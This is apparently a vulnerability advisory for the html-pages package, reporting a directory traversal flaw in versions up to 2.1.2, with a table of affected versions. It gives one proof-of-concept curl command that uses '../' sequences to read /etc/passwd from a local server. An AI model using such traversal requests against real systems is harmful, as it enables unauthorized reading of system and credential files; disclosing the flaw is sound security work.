html-pages is vulnerable to directory traversal attacks. A malicious user can obtain access to files on the system by prepending ../
in the url or curl request such as $ curl -v --path-as-is http://127.0.0.1:8000/../../../../../etc/passwd
CPE | Name | Operator | Version |
---|---|---|---|
html-pages | eq | 0.0.1 | |
html-pages | le | 2.1.2 | |
html-pages | eq | 0.0.1 | |
html-pages | le | 2.1.2 |